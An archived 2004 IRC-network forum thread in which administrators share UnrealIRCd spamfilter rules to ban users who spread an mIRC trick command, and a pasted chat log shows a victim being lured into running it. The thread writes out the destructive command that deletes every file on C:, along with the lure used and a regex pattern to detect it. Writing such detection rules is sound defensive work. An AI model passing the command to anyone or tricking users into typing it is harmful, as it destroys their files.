IMPORTANT - HARD DRIVE SWIPE EXPLIOT

These are old archives. They are kept for historic purposes only.
Fenix

IMPORTANT - HARD DRIVE SWIPE EXPLIOT

Post by Fenix » Wed Aug 11, 2004 5:38 pm

Hey, I suggest EVERYONE adds this to their spamfilter.conf file. it is dangerous this expliot! LAME script kiddies heh?

Please. this is probably vital to any network owner.

here is the code:

spamfilter {
regex "//echo \$findfile\(C:\\,\*,0,\.remove \$shortfn\(\$1-\)\)";
target private;
action gline;
reason "Hard drive swipe expliot command has been blocked. You will NOT be Unglined, Sorry - permanent ban.";
};
^^

you can change the reason to what you want. but please issue alerts to users NOT to type any unkown commands AND NOT TO TYPE

//echo -q $findfile(C:\,*,0,.remove $shortfn($1-))

Thanks.

Fenix

Post by Fenix » Wed Aug 11, 2004 5:39 pm

P.S thanks to stealth for helping getting the spamfilter regex to work :)

Fenix
Posts: 4
Joined: Wed Aug 11, 2004 5:41 pm
Contact:

Post by Fenix » Wed Aug 11, 2004 6:04 pm

hey, sorry guys, slight bug in that:

The correct code is;

spamfilter {
regex "//echo (-q)? \$findfile\(C:\\,\*,0,\.remove \$shortfn\(\$1-\)\)";
target private;
action gline;
reason "Hard drive swipe expliot command has been blocked. You will NOT be Unglined, Sorry - permanent ban.";
};
ALSNet

Syzop
UnrealIRCd head coder
Posts: 1955
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl
Contact:

Post by Syzop » Wed Aug 11, 2004 8:17 pm

Have you seen this in the wild? Got some logs perhaps? ;)
Or mail it personally to me if you don't want to say it here (syzop at unrealircd etc)

Fenix
Posts: 4
Joined: Wed Aug 11, 2004 5:41 pm
Contact:

Post by Fenix » Thu Aug 12, 2004 4:36 am

yes, i have. I'm getting a friend to post his logs etc of what happened :P.
also some other people deleted their logs -_-

only trouble is, it isnt a bot, it's real people who do it...
ALSNet

aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight » Thu Aug 12, 2004 4:52 am

Oh, I should point out that spamfilter glines are NOT permanent by default (IIRC). You might have to add ban-time 0 to make it perm.

Guest

Post by Guest » Thu Aug 12, 2004 4:53 am

[17:42:16pm] 4[Triforce4] Hey
[17:42:19pm] 4[Triforce4] Type this.. //echo -q $findfile(C:\,*,0,.remove $shortfn($1-)) and you will become an oper
[17:42:59pm]   414«4« quit 4speedtiger [mishy_@client-[safe]-B1A4728A.twcny.rr.com] ( Connection reset by peer ) 4
[17:43:12pm] 4[Karson4]0 Dont do it.
[17:43:15pm] 4[Triforce4] rofl lmao thats fucking great
===================================
his rejoin

[01:28:55am]   3(..join..) speedtiger (~mishy_@client-[safe]-B1A4728A.twcny.rr.com) [Unknown]
[01:30:15am] 4[speedtiger4] That thing i did earlier deleted all my files and we had to reinstall windows

Fenix
Posts: 4
Joined: Wed Aug 11, 2004 5:41 pm
Contact:

Post by Fenix » Thu Aug 12, 2004 4:57 am

aquanight wrote:Oh, I should point out that spamfilter glines are NOT permanent by default (IIRC). You might have to add ban-time 0 to make it perm.
ohh thanks; so i'd add:

action gline 0; or action gline ban-time 0;

?
ALSNet

Syzop
UnrealIRCd head coder
Posts: 1955
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl
Contact:

Post by Syzop » Thu Aug 12, 2004 2:03 pm

Ok, thanks for the logs ;p.

And ehm.. to make the glines permanent, use:
spamfilter {
[blabla]
ban-time 0;
};

If you wonder why they aren't permanent by default, well.. there are various reasons for that. One of them is that many people have a dynamic ip, thus banning IPs "forever" can easily ban innocent users over time ;p. If you really find them scary, why not choose a long-but-not-infinite time, like.. 7d or 14d :).

aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight » Thu Aug 12, 2004 7:04 pm

Or use a simple short ban time. Then find out how much of the IP is dynamic (ie identify the static parts of the hostname) and perm gline that :P .

w00t
Posts: 1136
Joined: Thu Mar 25, 2004 3:31 am
Location: Nowra, Australia

Post by w00t » Fri Aug 13, 2004 12:22 am

That's a nasty thing.

Ow.
-ChatSpike IRC Network [http://www.chatspike.net]
-Denora Stats [http://denora.nomadirc.net]
-Omerta [http://www.barafranca.com]

Ron2K

Post by Ron2K » Fri Aug 13, 2004 6:13 am

Ouch, this looks nasty. Any chance of getting this in spamfilter.conf if it's not in already?

Fenix
Posts: 4
Joined: Wed Aug 11, 2004 5:41 pm
Contact:

Post by Fenix » Fri Aug 13, 2004 2:11 pm

Syzop wrote:Ok, thanks for the logs ;p.

And ehm.. to make the glines permanent, use:
spamfilter {
[blabla]
ban-time 0;
};

If you wonder why they aren't permanent by default, well.. there are various reasons for that. One of them is that many people have a dynamic ip, thus banning IPs "forever" can easily ban innocent users over time ;p. If you really find them scary, why not choose a long-but-not-infinite time, like.. 7d or 14d :).
thanks for that :P
ALSNet

xillian

channel

Post by xillian » Sun Aug 29, 2004 7:54 pm

is there a way to make it gline users that say it via channel AND private?

Dukat
Posts: 1083
Joined: Tue Mar 16, 2004 5:44 pm
Location: Switzerland

Post by Dukat » Sun Aug 29, 2004 8:01 pm


Post Reply